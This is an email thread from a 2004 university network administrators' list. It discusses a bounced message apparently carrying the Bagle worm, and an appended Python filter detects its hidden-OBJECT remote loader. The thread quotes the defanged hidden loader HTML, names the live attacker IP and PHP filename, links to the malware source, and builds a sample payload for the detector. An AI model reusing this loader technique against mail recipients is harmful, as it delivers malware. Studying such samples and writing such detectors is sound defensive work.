For anyone who is curious, I nabbed a copy of the 231166.php source.  Pretty
clever. I believe that the image (ezmvoyx.jpeg) is the actual virus.

http://www.msu.edu/~colepet/bagle.txt


     Peter Cole
     IT Administration
     Michigan State University Press
     517.355.9543 x106 - [log in to unmask]
     http://msupress.msu.edu




-----Original Message-----
From: MSU Network Administrators Group [mailto:[log in to unmask]]On
Behalf Of Gene Willacker
Sent: Thursday, March 18, 2004 11:55 AM
To: [log in to unmask]
Subject: [MSUNAG] Is this an example? (Re: Disabling preview pane..)


This is something that bounced back to our postmaster account this morning.

Just to be safe, in the HTML below, I changed OBJECT to WACKJECT and
STYLE to STOOL.

The IP address it goes to is: 68.66.185.120:81
The filename is: 231166.php

------ This is a copy of the message, including all the headers. ------

Return-path: <[log in to unmask]>
Received: from ngging.user.msu.edu ([35.11.229.182] helo=coeur.net)
    by sys18.mail.msu.edu with smtp (Exim 4.24 #37)
    id 1B3oF6-0002r5-0R
    for [log in to unmask]; Wed, 17 Mar 2004 22:30:48 -0500
Date: Wed, 17 Mar 2004 22:28:35 -0500
To: [log in to unmask]
Subject: Re: Msg reply
From: [log in to unmask]
Message-ID: <[log in to unmask]>
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Virus: None found by Clam AV

<html><body>
<font face="System">
<WACKJECT  STOOL="display:none" DATA="http://nn.66.185.120:81/nnnnnn.php">
</WACKJECT></body></html>

--
*Gene Willacker*
Systems Analyst
H&FS Systems Operations Group
Michigan State University
Food Stores Building
East Lansing, MI 48824
/1-517-353-1691/

---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.624 / Virus Database: 401 - Release Date: 3/15/2004

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.634 / Virus Database: 406 - Release Date: 3/18/2004
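
Added example, not part of the original thread: a minimal mail-filter check in Python for the pattern in the bounced message, an HTML part whose OBJECT tag loads its DATA from a remote http URL. The sample message is constructed (tag names restored, documentation address 192.0.2.10 and a placeholder filename substituted), and the class and function names are hypothetical.

```python
import ipaddress
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlsplit

class ObjectTagScanner(HTMLParser):
    """Records every <object> tag whose data attribute is an http(s) URL."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":              # HTMLParser lowercases tag/attribute names
            return
        attr = {name: (value or "") for name, value in attrs}
        data = attr.get("data", "").strip()
        try:
            url = urlsplit(data)
            port = url.port
        except ValueError:               # malformed URL or port: not handled here
            return
        if url.scheme not in ("http", "https"):
            return
        try:
            ipaddress.ip_address(url.hostname or "")
            ip_literal = True            # bare IP instead of a host name
        except ValueError:
            ip_literal = False
        style = "".join(attr.get("style", "").lower().split())
        self.findings.append({"url": data, "hidden": "display:none" in style,
                              "ip_literal": ip_literal, "port": port})

def scan_message(raw):
    """Return findings for all text/html parts of an RFC 822 message string."""
    scanner = ObjectTagScanner()
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            body = part.get_payload(decode=True) or b""
            scanner.feed(body.decode(part.get_content_charset() or "latin-1", "replace"))
    return scanner.findings

# Constructed sample modelled on the bounced message; address and filename are placeholders.
SAMPLE = ("From: sender@example.com\nSubject: Re: Msg reply\nMIME-Version: 1.0\n"
          "Content-Type: text/html; charset=us-ascii\n\n"
          '<html><body>\n<font face="System">\n'
          '<OBJECT STYLE="display:none" DATA="http://192.0.2.10:81/example.php">\n'
          "</OBJECT></body></html>\n")

if __name__ == "__main__":
    for finding in scan_message(SAMPLE):
        print(finding)
```

A filter would typically quarantine any finding with `hidden` set, and treat `ip_literal` or a non-default `port` as additional weight.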